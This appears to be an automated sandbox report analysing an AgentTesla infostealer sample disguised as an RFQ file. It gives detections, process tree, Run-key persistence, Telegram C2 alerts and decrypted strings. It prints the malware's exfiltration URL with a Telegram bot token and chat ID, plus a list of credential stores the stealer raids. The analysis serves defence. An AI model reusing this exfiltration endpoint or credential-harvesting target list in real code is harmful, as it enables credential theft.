Edit tour

Windows Analysis Report
08(2)_00.exe

Overview

General Information

Sample name:	08(2)_00.exe renamed because original name is a hash value
Original sample name:	---RFQ_1282-2023.03.08(2)_00.exe
Analysis ID:	1524791
MD5:	4fdf9741c120f25e66ba4cf07067c5d5
SHA1:	7edfe85c45ead131f31f158c6c4ba2ef5f6291c8
SHA256:	3702d77895124b57140bce0482029875be25274a2c30ec6d8fac8bbdfcd92394
Tags:	exeuser-abuse_ch
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected AntiVM3

Yara detected Telegram RAT

.NET source code contains potential unpacker

AI detected suspicious sample

Contains functionality to register a low level keyboard hook

Hides that the sample has been downloaded from the Internet (zone.identifier)

Installs a global keyboard hook

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Potential key logger detected (key state polling based)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

08(2)_00.exe (PID: 5992 cmdline: "C:\Users\user\Desktop\08(2)_00.exe" MD5: 4FDF9741C120F25E66BA4CF07067C5D5)

RegAsm.exe (PID: 3508 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

fOLFRQq.exe (PID: 4496 cmdline: "C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

conhost.exe (PID: 5316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

fOLFRQq.exe (PID: 2916 cmdline: "C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

conhost.exe (PID: 3324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendMessage?chat_id=5928888099"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.3868083116.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000002.00000002.3869447768.00000000030E7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.3869447768.00000000030E7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1432692321.0000000004319000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
Process Memory Space: 08(2)_00.exe PID: 5992	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegAsm.exe PID: 3508	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 3508	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegAsm.exe PID: 3508	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
decrypted.memstr	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
decrypted.memstr	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.08(2)_00.exe.43f0218.3.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.08(2)_00.exe.43c61e8.4.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.2.RegAsm.exe.400000.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.08(2)_00.exe.43f0218.3.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.08(2)_00.exe.43c61e8.4.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.08(2)_00.exe.435a978.2.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
Click to see the 1 entries

Sigma Signatures

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3508, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fOLFRQq

Suricata Signatures

ETPRO MALWARE Agent Tesla Telegram Exfil

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T09:17:25.387729+0200	2851779	1	Malware Command and Control Activity Detected	192.168.2.8	49705	149.154.167.220	443	TCP

ETPRO MALWARE Agent Tesla Telegram Exfil M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T09:17:25.387729+0200	2852815	1	Malware Command and Control Activity Detected	192.168.2.8	49705	149.154.167.220	443	TCP
2024-10-03T09:17:26.603483+0200	2852815	1	Malware Command and Control Activity Detected	192.168.2.8	49706	149.154.167.220	443	TCP
2024-10-03T09:19:04.209585+0200	2852815	1	Malware Command and Control Activity Detected	192.168.2.8	49715	149.154.167.220	443	TCP
2024-10-03T09:19:19.509096+0200	2852815	1	Malware Command and Control Activity Detected	192.168.2.8	49716	149.154.167.220	443	TCP
2024-10-03T09:19:22.401628+0200	2852815	1	Malware Command and Control Activity Detected	192.168.2.8	49717	149.154.167.220	443	TCP
2024-10-03T09:19:26.207492+0200	2852815	1	Malware Command and Control Activity Detected	192.168.2.8	49718	149.154.167.220	443	TCP
2024-10-03T09:19:31.259133+0200	2852815	1	Malware Command and Control Activity Detected	192.168.2.8	49719	149.154.167.220	443	TCP
2024-10-03T09:19:37.555481+0200	2852815	1	Malware Command and Control Activity Detected	192.168.2.8	49720	149.154.167.220	443	TCP
2024-10-03T09:19:39.334371+0200	2852815	1	Malware Command and Control Activity Detected	192.168.2.8	49721	149.154.167.220	443	TCP
2024-10-03T09:20:25.017978+0200	2852815	1	Malware Command and Control Activity Detected	192.168.2.8	49722	149.154.167.220	443	TCP
2024-10-03T09:20:34.838501+0200	2852815	1	Malware Command and Control Activity Detected	192.168.2.8	49723	149.154.167.220	443	TCP
2024-10-03T09:20:36.342298+0200	2852815	1	Malware Command and Control Activity Detected	192.168.2.8	49724	149.154.167.220	443	TCP
2024-10-03T09:20:48.244583+0200	2852815	1	Malware Command and Control Activity Detected	192.168.2.8	49725	149.154.167.220	443	TCP
2024-10-03T09:20:54.389550+0200	2852815	1	Malware Command and Control Activity Detected	192.168.2.8	49726	149.154.167.220	443	TCP
2024-10-03T09:21:15.789221+0200	2852815	1	Malware Command and Control Activity Detected	192.168.2.8	49727	149.154.167.220	443	TCP
2024-10-03T09:21:27.976770+0200	2852815	1	Malware Command and Control Activity Detected	192.168.2.8	49728	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.2.08(2)_00.exe.43f0218.3.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendMessage?chat_id=5928888099"}
Source: RegAsm.exe.3508.2.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendMessage"}

Multi AV Scanner detection for domain / URL

Source: https://api.telegram.org/bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/

Virustotal: Detection: 5%

Perma Link

Multi AV Scanner detection for submitted file

Source: 08(2)_00.exe	ReversingLabs: Detection: 75%
Source: 08(2)_00.exe	Virustotal: Detection: 70%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 08(2)_00.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: /log.tmp
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: text/html
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: text/html
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <br>[
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: yyyy-MM-dd HH:mm:ss
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: ]<br>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <br>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: text/html
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: application/zip
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Time:
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: MM/dd/yyyy HH:mm:ss
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <br>User Name:
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <br>Computer Name:
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <br>OSFullName:
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <br>CPU:
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <br>RAM:
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <br>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: IP Address:
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <br>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <hr>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: New
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: MM/dd/yyyy HH:mm:ss
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: IP Address:
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: true
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: https://api.ipify.org
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: true
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: true
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: true
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: false
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: true
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: true
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: https://api.telegram.org/bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: 5928888099
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: true
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: false
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: appdata
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: fOLFRQq
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: fOLFRQq.exe
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: fOLFRQq
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Type
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Software\Microsoft\Windows\CurrentVersion\Run
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <br>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <hr>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <br>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <b>[
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: ]</b> (
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: )<br>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: {BACK}
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: {ALT+TAB}
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: {ALT+F4}
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: {TAB}
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: {ESC}
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: {Win}
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: {CAPSLOCK}
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: {KEYUP}
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: {KEYDOWN}
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: {KEYLEFT}
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: {KEYRIGHT}
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: {DEL}
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: {END}
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: {HOME}
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: {Insert}
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: {NumLock}
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: {PageDown}
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: {PageUp}
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: {ENTER}
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: {F1}
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: {F2}
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: {F3}
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: {F4}
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: {F5}
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: {F6}
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: {F7}
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: {F8}
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: {F9}
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: {F10}
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: {F11}
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: {F12}
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: control
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: {CTRL}
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: &
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: >
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: "
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <br><hr>Copied Text: <br>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <hr>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: logins
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: IE/Edge
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Windows Secure Note
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Windows Web Password Credential
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Windows Credential Picker Protector
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Web Credentials
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Windows Credentials
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Windows Domain Certificate Credential
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Windows Domain Password Credential
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Windows Extended Credential
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: 00000000-0000-0000-0000-000000000000
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: SchemaId
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: pResourceElement
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: pIdentityElement
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: pPackageSid
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: pAuthenticatorElement
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: IE/Edge
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: UC Browser
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: UCBrowser\
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Login Data
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: journal
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: wow_logins
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Safari for Windows
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \Apple Computer\Preferences\keychain.plist
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <array>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <dict>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <string>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: </string>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <string>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: </string>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: <data>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: </data>
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: -convert xml1 -s -o "
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \fixed_keychain.xml"
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \Microsoft\Credentials\
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \Microsoft\Credentials\
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \Microsoft\Credentials\
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \Microsoft\Credentials\
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \Microsoft\Protect\
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: credential
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: QQ Browser
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Tencent\QQBrowser\User Data
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \Default\EncryptedStorage
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Profile
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \EncryptedStorage
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: entries
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: category
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Password
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: str3
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: str2
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: blob0
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: password_value
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: IncrediMail
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: PopPassword
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: SmtpPassword
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Software\IncrediMail\Identities\
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \Accounts_New
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: PopPassword
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: SmtpPassword
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: SmtpServer
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: EmailAddress
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Eudora
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Software\Qualcomm\Eudora\CommandLine\
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: current
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Settings
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: SavePasswordText
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Settings
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: ReturnAddress
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Falkon Browser
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \falkon\profiles\
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: profiles.ini
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: startProfile=([A-z0-9\/\.\"]+)
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: profiles.ini
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \browsedata.db
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: autofill
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: ClawsMail
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \Claws-mail
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \clawsrc
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \clawsrc
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: passkey0
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: master_passphrase_salt=(.+)
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: master_passphrase_pbkdf2_rounds=(.+)
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \accountrc
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: smtp_server
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: address
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: account
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \passwordstorerc
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: {(.),(.)}(.*)
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Flock Browser
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: APPDATA
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \Flock\Browser\
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: signons3.txt
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: DynDns
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: ALLUSERSPROFILE
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Dyn\Updater\config.dyndns
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: username=
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: password=
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: https://account.dyn.com/
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: t6KzXhCh
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: ALLUSERSPROFILE
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Dyn\Updater\daemon.cfg
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: global
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: accounts
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: account.
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: username
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: account.
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: password
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Psi/Psi+
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: name
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: password
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Psi/Psi+
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: APPDATA
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \Psi\profiles
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: APPDATA
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \Psi+\profiles
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \accounts.xml
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: \accounts.xml
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: OpenVPN
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Software\OpenVPN-GUI\configs
Source: 0.2.08(2)_00.exe.43f0218.3.unpack	String decryptor: Software\OpenVPN-GUI\configs
